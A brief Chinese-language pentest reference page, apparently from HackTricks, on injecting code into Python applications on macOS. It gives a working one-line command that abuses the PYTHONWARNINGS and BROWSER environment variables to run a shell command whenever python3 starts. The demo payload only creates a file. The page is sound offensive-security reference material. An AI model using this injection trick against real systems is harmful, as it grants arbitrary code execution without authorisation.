macOS Python Applications Injection
通过PYTHONWARNINGS
和BROWSER
环境变量
PYTHONWARNINGS
和BROWSER
环境变量可以修改这两个环境变量,以在调用python时执行任意代码,例如:
# Generate example python script
echo "print('hi')" > /tmp/script.py
# RCE which will generate file /tmp/hacktricks
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py
最后更新于